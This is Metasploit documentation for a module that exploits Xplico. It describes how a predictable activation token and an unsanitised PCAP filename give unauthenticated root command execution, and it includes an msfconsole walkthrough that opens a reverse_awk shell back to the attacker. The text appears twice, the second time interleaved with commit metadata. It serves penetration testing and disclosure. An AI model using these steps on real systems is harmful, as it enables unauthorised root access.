documentation/modules/exploit/linux/http/xplico_exec.md

## Vulnerable Application
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.

The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet 
traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
 a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.

One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.

**Vulnerable Application Installation Steps**

Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0 

[http://wiki.xplico.org/doku.php?id=ubuntu](http://wiki.xplico.org/doku.php?id=ubuntu)

You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova.
[https://sourceforge.net/projects/xplico/files/VirtualBox%20images/](https://sourceforge.net/projects/xplico/files/VirtualBox%20images/)

Username of the virtualbox image is "ubuntu" and password is "reverse".

## Verification Steps

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/securityonion_xplico_exec`
- [ ] Set `RHOST`
- [ ] Set `PAYLOAD cmd/unix/reverse_awk`
- [ ] Set `LHOST`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `New user successfully registered` in console.
- [ ] **Verify** that you are seeing `User successfully activated` in console.
- [ ] **Verify** that you are seeing `Successfully authenticated` in console.
- [ ] **Verify** that you are seeing `New Case successfully creted` in console.
- [ ] **Verify** that you are seeing `New Sols successfully creted` in console.
- [ ] **Verify** that you are seeing `PCAP successfully uploaded. Pcap parser is going to start on server side` in console.
- [ ] **Verify** that you are getting `We are at PCAP decoding phase. Little bit more patience...` in console.
- [ ] **Verify** that you have your root shell.

## Scenarios

```
msf > use exploit/linux/http/securityonion_xplico_exec
msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
RHOST => 12.0.0.30
msf exploit(securityonion_xplico_exec) > 
msf exploit(securityonion_xplico_exec) > exploit 

[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
set payload cmd/unix/generic         set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_awk     
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk 
payload => cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(securityonion_xplico_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: mwbvnyowr
[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
[*] Calculating em_key code of the user
[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully creted. Our pol_id = 36
[*] Creating new xplico session for pcap
[+] New Sols successfully creted. Our sol_id = 54
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300

id
uid=0(root) gid=0(root) groups=0(root)
```
Add xplico remote code execution 2017-11-14 09:30:57 +03:00			`## Vulnerable Application`
			`This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.`

			`The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet`
			`traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create`
			`a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try`
			`to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.`
			`But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.`

			`One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum`
			`of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.`

			`Vulnerable Application Installation Steps`

			`Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0`

			`[http://wiki.xplico.org/doku.php?id=ubuntu](http://wiki.xplico.org/doku.php?id=ubuntu)`

Updatig documentation and tweaking initiate_session 2017-11-15 01:04:06 +03:00			`You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova.`
Add xplico remote code execution 2017-11-14 09:30:57 +03:00			`[https://sourceforge.net/projects/xplico/files/VirtualBox%20images/](https://sourceforge.net/projects/xplico/files/VirtualBox%20images/)`

Updatig documentation and tweaking initiate_session 2017-11-15 01:04:06 +03:00			`Username of the virtualbox image is "ubuntu" and password is "reverse".`

Add xplico remote code execution 2017-11-14 09:30:57 +03:00			`## Verification Steps`

			`A successful check of the exploit will look like this:`

			- [ ] Start `msfconsole`
			- [ ] `use exploit/linux/http/securityonion_xplico_exec`
			- [ ] Set `RHOST`
			- [ ] Set `PAYLOAD cmd/unix/reverse_awk`
			- [ ] Set `LHOST`
			- [ ] Run `exploit`
			- [ ] Verify that you are seeing `New user successfully registered` in console.
			- [ ] Verify that you are seeing `User successfully activated` in console.
			- [ ] Verify that you are seeing `Successfully authenticated` in console.
			- [ ] Verify that you are seeing `New Case successfully creted` in console.
			- [ ] Verify that you are seeing `New Sols successfully creted` in console.
			- [ ] Verify that you are seeing `PCAP successfully uploaded. Pcap parser is going to start on server side` in console.
			- [ ] Verify that you are getting `We are at PCAP decoding phase. Little bit more patience...` in console.
			`- [ ] Verify that you have your root shell.`

			`## Scenarios`

			```
			`msf > use exploit/linux/http/securityonion_xplico_exec`
			`msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30`
			`RHOST => 12.0.0.30`
			`msf exploit(securityonion_xplico_exec) >`
			`msf exploit(securityonion_xplico_exec) > exploit`

			`[-] Exploit failed: A payload has not been selected.`
			`[*] Exploit completed, but no session was created.`
			`msf exploit(securityonion_xplico_exec) > set payload cmd/unix/`
			`set payload cmd/unix/generic set payload cmd/unix/reverse_netcat`
			`set payload cmd/unix/reverse_awk`
			`msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk`
			`payload => cmd/unix/reverse_awk`
			`msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1`
			`LHOST => 12.0.0.1`
			`msf exploit(securityonion_xplico_exec) > exploit`

			`[*] Started reverse TCP handler on 12.0.0.1:4444`
			`[*] Initiating new session on server side`
			`[*] Registering a new user`
			`[+] New user successfully registered`
			`[*] Username: mwbvnyowr`
			`[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT`
			`[*] Calculating em_key code of the user`
			`[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e`
			`[+] User successfully activated`
			`[*] Authenticating with our activated new user`
			`[+] Successfully authenticated`
			`[*] Creating new case`
			`[+] New Case successfully creted. Our pol_id = 36`
			`[*] Creating new xplico session for pcap`
			`[+] New Sols successfully creted. Our sol_id = 54`
			`[*] Uploading malformed PCAP file`
			`[+] PCAP successfully uploaded. Pcap parser is going to start on server side.`
			`[*] Parsing has started. Wait for parser to get the job done...`
			`[+] We are at PCAP decoding phase. Little bit more patience...`
			`[+] We are at PCAP decoding phase. Little bit more patience...`
			`[+] We are at PCAP decoding phase. Little bit more patience...`
			`[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300`

			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			```